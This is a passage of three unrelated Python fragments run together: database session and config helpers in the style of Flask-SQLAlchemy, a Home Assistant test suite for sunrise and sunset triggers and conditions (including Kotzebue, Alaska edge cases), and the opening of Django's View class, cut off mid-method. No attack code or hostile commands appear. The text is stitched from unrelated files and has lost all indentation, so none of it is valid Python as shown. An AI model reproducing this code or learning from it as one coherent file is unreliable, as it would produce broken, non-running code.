return orm.scoped_session(partial(self.create_session, options))
def create_session(self, options):
"""Create session instance using custom Session class that supports
multiple bindings.
"""
return self.session_class(self, **options)
def get_tables_for_bind(self, bind=None):
"""Returns a list of all tables relevant for a bind."""
return [table
for table in itervalues(self.metadata.tables)
if table.info.get('bind_key') == bind]
def _execute_for_all_tables(self, bind, operation, skip_tables=False):
"""Execute metadata operation for associated tables."""
if self.metadata is None:
raise UnmappedError('Missing declarative base model')
if bind == '__all__':
binds = [None] + list(self.config.get('SQLALCHEMY_BINDS') or {})
elif isinstance(bind, string_types) or bind is None:
binds = [bind]
else:
binds = bind
for bind in binds:
extra = {}
if not skip_tables:
tables = self.get_tables_for_bind(bind)
extra['tables'] = tables
metadata_operation = getattr(self.metadata, operation)
metadata_operation(bind=self.get_engine(bind), **extra)
def create_all(self, bind='__all__'):
"""Create database schema from models."""
self._execute_for_all_tables(bind, 'create_all')
def drop_all(self, bind='__all__'):
"""Drop tables defined by models."""
self._execute_for_all_tables(bind, 'drop_all')
def reflect(self, bind='__all__'):
"""Reflect tables from database."""
self._execute_for_all_tables(bind, 'reflect', skip_tables=True)
def __getattr__(self, attr):
"""Delegate all other attributes to :attr:`session`."""
return getattr(self.session, attr)
class Config(dict):
"""Configuration loader which acts like a dict but supports loading
values from an object limited to ``ALL_CAPS_ATTRIBUTES``.
"""
def __init__(self, defaults=None):
super(Config, self).__init__(defaults or {})
def from_object(self, obj):
"""Pull ``dir(obj)`` keys from `obj` and set onto ``self``."""
for key in dir(obj):
if key.isupper():
self[key] = getattr(obj, key)
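# Example (with a hypothetical Settings class): given
# ``class Settings: SQLALCHEMY_ECHO = True`` plus a lower-case attribute
# ``debug``, ``Config().from_object(Settings)`` copies only the
# upper-case ``SQLALCHEMY_ECHO`` key.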
def engine_options_from_config(config):
"""Return engine options derived from config object."""
options = {}
def _setdefault(optionkey, configkey):
"""Set options key if config key is not None."""
if config.get(configkey) is not None:
options[optionkey] = config[configkey]
_setdefault('echo', 'SQLALCHEMY_ECHO')
_setdefault('pool_size', 'SQLALCHEMY_POOL_SIZE')
_setdefault('pool_timeout', 'SQLALCHEMY_POOL_TIMEOUT')
_setdefault('pool_recycle', 'SQLALCHEMY_POOL_RECYCLE')
_setdefault('max_overflow', 'SQLALCHEMY_MAX_OVERFLOW')
return options
|
|
"""The tests for the sun automation."""
from datetime import datetime
import pytest
from homeassistant.components import sun
import homeassistant.components.automation as automation
from homeassistant.const import SUN_EVENT_SUNRISE, SUN_EVENT_SUNSET
from homeassistant.setup import async_setup_component
import homeassistant.util.dt as dt_util
from tests.async_mock import patch
from tests.common import async_fire_time_changed, async_mock_service, mock_component
from tests.components.automation import common
ORIG_TIME_ZONE = dt_util.DEFAULT_TIME_ZONE
@pytest.fixture
def calls(hass):
"""Track calls to a mock service."""
return async_mock_service(hass, "test", "automation")
@pytest.fixture(autouse=True)
def setup_comp(hass):
"""Initialize components."""
mock_component(hass, "group")
dt_util.set_default_time_zone(hass.config.time_zone)
hass.loop.run_until_complete(
async_setup_component(hass, sun.DOMAIN, {sun.DOMAIN: {sun.CONF_ELEVATION: 0}})
)
def teardown():
"""Restore."""
dt_util.set_default_time_zone(ORIG_TIME_ZONE)
async def test_sunset_trigger(hass, calls, legacy_patchable_time):
"""Test the sunset trigger."""
now = datetime(2015, 9, 15, 23, tzinfo=dt_util.UTC)
trigger_time = datetime(2015, 9, 16, 2, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {"platform": "sun", "event": SUN_EVENT_SUNSET},
"action": {"service": "test.automation"},
}
},
)
await common.async_turn_off(hass)
await hass.async_block_till_done()
async_fire_time_changed(hass, trigger_time)
await hass.async_block_till_done()
assert len(calls) == 0
with patch("homeassistant.util.dt.utcnow", return_value=now):
await common.async_turn_on(hass)
await hass.async_block_till_done()
async_fire_time_changed(hass, trigger_time)
await hass.async_block_till_done()
assert len(calls) == 1
async def test_sunrise_trigger(hass, calls, legacy_patchable_time):
"""Test the sunrise trigger."""
now = datetime(2015, 9, 13, 23, tzinfo=dt_util.UTC)
trigger_time = datetime(2015, 9, 16, 14, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {"platform": "sun", "event": SUN_EVENT_SUNRISE},
"action": {"service": "test.automation"},
}
},
)
async_fire_time_changed(hass, trigger_time)
await hass.async_block_till_done()
assert len(calls) == 1
async def test_sunset_trigger_with_offset(hass, calls, legacy_patchable_time):
"""Test the sunset trigger with offset."""
now = datetime(2015, 9, 15, 23, tzinfo=dt_util.UTC)
trigger_time = datetime(2015, 9, 16, 2, 30, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "sun",
"event": SUN_EVENT_SUNSET,
"offset": "0:30:00",
},
"action": {
"service": "test.automation",
"data_template": {
"some": "{{ trigger.%s }}"
% "}} - {{ trigger.".join(("platform", "event", "offset"))
},
},
}
},
)
async_fire_time_changed(hass, trigger_time)
await hass.async_block_till_done()
assert len(calls) == 1
assert calls[0].data["some"] == "sun - sunset - 0:30:00"
async def test_sunrise_trigger_with_offset(hass, calls, legacy_patchable_time):
"""Test the sunrise trigger with offset."""
now = datetime(2015, 9, 13, 23, tzinfo=dt_util.UTC)
trigger_time = datetime(2015, 9, 16, 13, 30, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "sun",
"event": SUN_EVENT_SUNRISE,
"offset": "-0:30:00",
},
"action": {"service": "test.automation"},
}
},
)
async_fire_time_changed(hass, trigger_time)
await hass.async_block_till_done()
assert len(calls) == 1
async def test_if_action_before_sunrise_no_offset(hass, calls):
"""
Test if action was before sunrise.
Before sunrise is true from midnight until sunrise, local time.
"""
await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {"platform": "event", "event_type": "test_event"},
"condition": {"condition": "sun", "before": SUN_EVENT_SUNRISE},
"action": {"service": "test.automation"},
}
},
)
# sunrise: 2015-09-16 06:32:43 local, sunset: 2015-09-16 18:55:24 local
# sunrise: 2015-09-16 13:32:43 UTC, sunset: 2015-09-17 01:55:24 UTC
# now = sunrise + 1s -> 'before sunrise' not true
now = datetime(2015, 9, 16, 13, 32, 44, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 0
# now = sunrise -> 'before sunrise' true
now = datetime(2015, 9, 16, 13, 32, 43, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
# now = local midnight -> 'before sunrise' true
now = datetime(2015, 9, 16, 7, 0, 0, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 2
# now = local midnight - 1s -> 'before sunrise' not true
now = datetime(2015, 9, 17, 6, 59, 59, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 2
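# In these condition tests, 'before sunrise' covers the window from local
# midnight up to sunrise, and 'after sunrise' covers sunrise up to the next
# local midnight; the before_offset/after_offset options used below shift
# that boundary, e.g. "+1:00:00" moves it one hour later.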
async def test_if_action_after_sunrise_no_offset(hass, calls):
"""
Test if action was after sunrise.
After sunrise is true from sunrise until midnight, local time.
"""
await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {"platform": "event", "event_type": "test_event"},
"condition": {"condition": "sun", "after": SUN_EVENT_SUNRISE},
"action": {"service": "test.automation"},
}
},
)
# sunrise: 2015-09-16 06:32:43 local, sunset: 2015-09-16 18:55:24 local
# sunrise: 2015-09-16 13:32:43 UTC, sunset: 2015-09-17 01:55:24 UTC
# now = sunrise - 1s -> 'after sunrise' not true
now = datetime(2015, 9, 16, 13, 32, 42, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 0
# now = sunrise + 1s -> 'after sunrise' true
now = datetime(2015, 9, 16, 13, 32, 43, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
# now = local midnight -> 'after sunrise' not true
now = datetime(2015, 9, 16, 7, 0, 0, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
# now = local midnight - 1s -> 'after sunrise' true
now = datetime(2015, 9, 17, 6, 59, 59, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 2
async def test_if_action_before_sunrise_with_offset(hass, calls):
"""
Test if action was before sunrise with offset.
Before sunrise is true from midnight until sunrise, local time.
"""
await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {"platform": "event", "event_type": "test_event"},
"condition": {
"condition": "sun",
"before": SUN_EVENT_SUNRISE,
"before_offset": "+1:00:00",
},
"action": {"service": "test.automation"},
}
},
)
# sunrise: 2015-09-16 06:32:43 local, sunset: 2015-09-16 18:55:24 local
# sunrise: 2015-09-16 13:32:43 UTC, sunset: 2015-09-17 01:55:24 UTC
# now = sunrise + 1s + 1h -> 'before sunrise' with offset +1h not true
now = datetime(2015, 9, 16, 14, 32, 44, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 0
# now = sunrise + 1h -> 'before sunrise' with offset +1h true
now = datetime(2015, 9, 16, 14, 32, 43, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
# now = UTC midnight -> 'before sunrise' with offset +1h not true
now = datetime(2015, 9, 17, 0, 0, 0, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
# now = UTC midnight - 1s -> 'before sunrise' with offset +1h not true
now = datetime(2015, 9, 16, 23, 59, 59, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
# now = local midnight -> 'before sunrise' with offset +1h true
now = datetime(2015, 9, 16, 7, 0, 0, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 2
# now = local midnight - 1s -> 'before sunrise' with offset +1h not true
now = datetime(2015, 9, 17, 6, 59, 59, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 2
# now = sunset -> 'before sunrise' with offset +1h not true
now = datetime(2015, 9, 17, 1, 56, 48, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 2
# now = sunset -1s -> 'before sunrise' with offset +1h not true
now = datetime(2015, 9, 17, 1, 56, 45, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 2
async def test_if_action_before_sunset_with_offset(hass, calls):
"""
Test if action was before sunset with offset.
Before sunset is true from midnight until sunset, local time.
"""
await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {"platform": "event", "event_type": "test_event"},
"condition": {
"condition": "sun",
"before": "sunset",
"before_offset": "+1:00:00",
},
"action": {"service": "test.automation"},
}
},
)
# sunrise: 2015-09-16 06:32:43 local, sunset: 2015-09-16 18:55:24 local
# sunrise: 2015-09-16 13:32:43 UTC, sunset: 2015-09-17 01:55:24 UTC
# now = local midnight -> 'before sunset' with offset +1h true
now = datetime(2015, 9, 16, 7, 0, 0, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
# now = sunset + 1s + 1h -> 'before sunset' with offset +1h not true
now = datetime(2015, 9, 17, 2, 55, 25, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
# now = sunset + 1h -> 'before sunset' with offset +1h true
now = datetime(2015, 9, 17, 2, 55, 24, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 2
# now = UTC midnight -> 'before sunset' with offset +1h true
now = datetime(2015, 9, 17, 0, 0, 0, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 3
# now = UTC midnight - 1s -> 'before sunset' with offset +1h true
now = datetime(2015, 9, 16, 23, 59, 59, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 4
# now = sunrise -> 'before sunset' with offset +1h true
now = datetime(2015, 9, 16, 13, 32, 43, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 5
# now = sunrise -1s -> 'before sunset' with offset +1h true
now = datetime(2015, 9, 16, 13, 32, 42, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 6
# now = local midnight-1s -> 'before sunset' with offset +1h not true
now = datetime(2015, 9, 17, 6, 59, 59, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 6
async def test_if_action_after_sunrise_with_offset(hass, calls):
"""
Test if action was after sunrise with offset.
After sunrise is true from sunrise until midnight, local time.
"""
await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {"platform": "event", "event_type": "test_event"},
"condition": {
"condition": "sun",
"after": SUN_EVENT_SUNRISE,
"after_offset": "+1:00:00",
},
"action": {"service": "test.automation"},
}
},
)
# sunrise: 2015-09-16 06:32:43 local, sunset: 2015-09-16 18:55:24 local
# sunrise: 2015-09-16 13:32:43 UTC, sunset: 2015-09-17 01:55:24 UTC
# now = sunrise - 1s + 1h -> 'after sunrise' with offset +1h not true
now = datetime(2015, 9, 16, 14, 32, 42, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 0
# now = sunrise + 1h -> 'after sunrise' with offset +1h true
now = datetime(2015, 9, 16, 14, 32, 43, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
# now = UTC noon -> 'after sunrise' with offset +1h not true
now = datetime(2015, 9, 16, 12, 0, 0, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
# now = UTC noon - 1s -> 'after sunrise' with offset +1h not true
now = datetime(2015, 9, 16, 11, 59, 59, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
# now = local noon -> 'after sunrise' with offset +1h true
now = datetime(2015, 9, 16, 19, 1, 0, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 2
# now = local noon - 1s -> 'after sunrise' with offset +1h true
now = datetime(2015, 9, 16, 18, 59, 59, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 3
# now = sunset -> 'after sunrise' with offset +1h true
now = datetime(2015, 9, 17, 1, 55, 24, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 4
# now = sunset + 1s -> 'after sunrise' with offset +1h true
now = datetime(2015, 9, 17, 1, 55, 25, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 5
# now = local midnight-1s -> 'after sunrise' with offset +1h true
now = datetime(2015, 9, 17, 6, 59, 59, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 6
# now = local midnight -> 'after sunrise' with offset +1h not true
now = datetime(2015, 9, 17, 7, 0, 0, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 6
async def test_if_action_after_sunset_with_offset(hass, calls):
"""
Test if action was after sunset with offset.
After sunset is true from sunset until midnight, local time.
"""
await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {"platform": "event", "event_type": "test_event"},
"condition": {
"condition": "sun",
"after": "sunset",
"after_offset": "+1:00:00",
},
"action": {"service": "test.automation"},
}
},
)
# sunrise: 2015-09-15 06:32:05 local, sunset: 2015-09-15 18:56:46 local
# sunrise: 2015-09-15 13:32:05 UTC, sunset: 2015-09-16 01:56:46 UTC
# now = sunset - 1s + 1h -> 'after sunset' with offset +1h not true
now = datetime(2015, 9, 16, 2, 56, 45, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 0
# now = sunset + 1h -> 'after sunset' with offset +1h true
now = datetime(2015, 9, 16, 2, 56, 46, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
# now = midnight-1s -> 'after sunset' with offset +1h true
now = datetime(2015, 9, 16, 6, 59, 59, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 2
# now = midnight -> 'after sunset' with offset +1h not true
now = datetime(2015, 9, 16, 7, 0, 0, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 2
async def test_if_action_before_and_after_during(hass, calls):
"""
Test if action was after sunrise and before sunset.
This is true from sunrise until sunset.
"""
await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {"platform": "event", "event_type": "test_event"},
"condition": {
"condition": "sun",
"after": SUN_EVENT_SUNRISE,
"before": SUN_EVENT_SUNSET,
},
"action": {"service": "test.automation"},
}
},
)
# sunrise: 2015-09-16 06:32:43 local, sunset: 2015-09-16 18:55:24 local
# sunrise: 2015-09-16 13:32:43 UTC, sunset: 2015-09-17 01:55:24 UTC
# now = sunrise - 1s -> 'after sunrise' + 'before sunset' not true
now = datetime(2015, 9, 16, 13, 32, 42, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 0
# now = sunset + 1s -> 'after sunrise' + 'before sunset' not true
now = datetime(2015, 9, 17, 1, 55, 25, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 0
# now = sunrise -> 'after sunrise' + 'before sunset' true
now = datetime(2015, 9, 16, 13, 32, 43, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
# now = sunset -> 'after sunrise' + 'before sunset' true
now = datetime(2015, 9, 17, 1, 55, 24, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 2
# now = 9AM local -> 'after sunrise' + 'before sunset' true
now = datetime(2015, 9, 16, 16, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 3
async def test_if_action_before_sunrise_no_offset_kotzebue(hass, calls):
"""
Test if action was before sunrise.
Local timezone: Alaska time
Location: Kotzebue, which has a very skewed local timezone with sunrise
at 7 AM and sunset at 3 AM during summer.
Before sunrise is true from midnight until sunrise, local time.
"""
tz = dt_util.get_time_zone("America/Anchorage")
dt_util.set_default_time_zone(tz)
hass.config.latitude = 66.5
hass.config.longitude = 162.4
await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {"platform": "event", "event_type": "test_event"},
"condition": {"condition": "sun", "before": SUN_EVENT_SUNRISE},
"action": {"service": "test.automation"},
}
},
)
# sunrise: 2015-07-24 07:17:24 local, sunset: 2015-07-25 03:16:27 local
# sunrise: 2015-07-24 15:17:24 UTC, sunset: 2015-07-25 11:16:27 UTC
# now = sunrise + 1s -> 'before sunrise' not true
now = datetime(2015, 7, 24, 15, 17, 25, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 0
# now = sunrise -> 'before sunrise' true
now = datetime(2015, 7, 24, 15, 17, 24, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
# now = local midnight -> 'before sunrise' true
now = datetime(2015, 7, 24, 8, 0, 0, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 2
# now = local midnight - 1s -> 'before sunrise' not true
now = datetime(2015, 7, 24, 7, 59, 59, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 2
async def test_if_action_after_sunrise_no_offset_kotzebue(hass, calls):
"""
Test if action was after sunrise.
Local timezone: Alaska time
Location: Kotzebue, which has a very skewed local timezone with sunrise
at 7 AM and sunset at 3 AM during summer.
After sunrise is true from sunrise until midnight, local time.
"""
tz = dt_util.get_time_zone("America/Anchorage")
dt_util.set_default_time_zone(tz)
hass.config.latitude = 66.5
hass.config.longitude = 162.4
await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {"platform": "event", "event_type": "test_event"},
"condition": {"condition": "sun", "after": SUN_EVENT_SUNRISE},
"action": {"service": "test.automation"},
}
},
)
# sunrise: 2015-07-24 07:17:24 local, sunset: 2015-07-25 03:16:27 local
# sunrise: 2015-07-24 15:17:24 UTC, sunset: 2015-07-25 11:16:27 UTC
# now = sunrise -> 'after sunrise' true
now = datetime(2015, 7, 24, 15, 17, 24, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
# now = sunrise - 1s -> 'after sunrise' not true
now = datetime(2015, 7, 24, 15, 17, 23, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
# now = local midnight -> 'after sunrise' not true
now = datetime(2015, 7, 24, 8, 0, 1, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
# now = local midnight - 1s -> 'after sunrise' true
now = datetime(2015, 7, 24, 7, 59, 59, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 2
async def test_if_action_before_sunset_no_offset_kotzebue(hass, calls):
"""
Test if action was before sunset.
Local timezone: Alaska time
Location: Kotzebue, which has a very skewed local timezone with sunrise
at 7 AM and sunset at 3 AM during summer.
Before sunset is true from midnight until sunset, local time.
"""
tz = dt_util.get_time_zone("America/Anchorage")
dt_util.set_default_time_zone(tz)
hass.config.latitude = 66.5
hass.config.longitude = 162.4
await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {"platform": "event", "event_type": "test_event"},
"condition": {"condition": "sun", "before": SUN_EVENT_SUNSET},
"action": {"service": "test.automation"},
}
},
)
# sunrise: 2015-07-24 07:17:24 local, sunset: 2015-07-25 03:16:27 local
# sunrise: 2015-07-24 15:17:24 UTC, sunset: 2015-07-25 11:16:27 UTC
# now = sunset + 1s -> 'before sunset' not true
now = datetime(2015, 7, 25, 11, 16, 28, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 0
# now = sunset -> 'before sunset' true
now = datetime(2015, 7, 25, 11, 16, 27, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
# now = local midnight -> 'before sunset' true
now = datetime(2015, 7, 24, 8, 0, 0, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 2
# now = local midnight - 1s -> 'before sunset' not true
now = datetime(2015, 7, 24, 7, 59, 59, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 2
async def test_if_action_after_sunset_no_offset_kotzebue(hass, calls):
"""
Test if action was after sunset.
Local timezone: Alaska time
Location: Kotzebue, which has a very skewed local timezone with sunrise
at 7 AM and sunset at 3 AM during summer.
After sunset is true from sunset until midnight, local time.
"""
tz = dt_util.get_time_zone("America/Anchorage")
dt_util.set_default_time_zone(tz)
hass.config.latitude = 66.5
hass.config.longitude = 162.4
await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {"platform": "event", "event_type": "test_event"},
"condition": {"condition": "sun", "after": SUN_EVENT_SUNSET},
"action": {"service": "test.automation"},
}
},
)
# sunrise: 2015-07-24 07:17:24 local, sunset: 2015-07-25 03:16:27 local
# sunrise: 2015-07-24 15:17:24 UTC, sunset: 2015-07-25 11:16:27 UTC
# now = sunset -> 'after sunset' true
now = datetime(2015, 7, 25, 11, 16, 27, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
# now = sunset - 1s -> 'after sunset' not true
now = datetime(2015, 7, 25, 11, 16, 26, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
# now = local midnight -> 'after sunset' not true
now = datetime(2015, 7, 24, 8, 0, 1, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
# now = local midnight - 1s -> 'after sunset' true
now = datetime(2015, 7, 24, 7, 59, 59, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 2
from __future__ import unicode_literals
import logging
from functools import update_wrapper
from django import http
from django.core.exceptions import ImproperlyConfigured
from django.core.urlresolvers import reverse, NoReverseMatch
from django.template.response import TemplateResponse
from django.utils.decorators import classonlymethod
from django.utils import six
logger = logging.getLogger('django.request')
class ContextMixin(object):
"""
A default context mixin that passes the keyword arguments received by
get_context_data as the template context.
"""
def get_context_data(self, **kwargs):
if 'view' not in kwargs:
kwargs['view'] = self
return kwargs
class View(object):
"""
Intentionally simple parent class for all views. Only implements
dispatch-by-method and simple sanity checking.
"""
http_method_names = ['get', 'post', 'put', 'patch', 'delete', 'head', 'options', 'trace']
def __init__(self, **kwargs):
"""
Constructor. Called in the URLconf; can contain helpful extra
keyword arguments, and other things.
"""
# Go through keyword arguments, and either save their values to our
# instance, or raise an error.
for key, value in six.iteritems(kwargs):
setattr(self, key, value)
@classonlymethod
def as_view(cls, **initkwargs):
"""
Main entry point for a request-response process.
"""
# sanitize keyword arguments
for key in initkwargs:
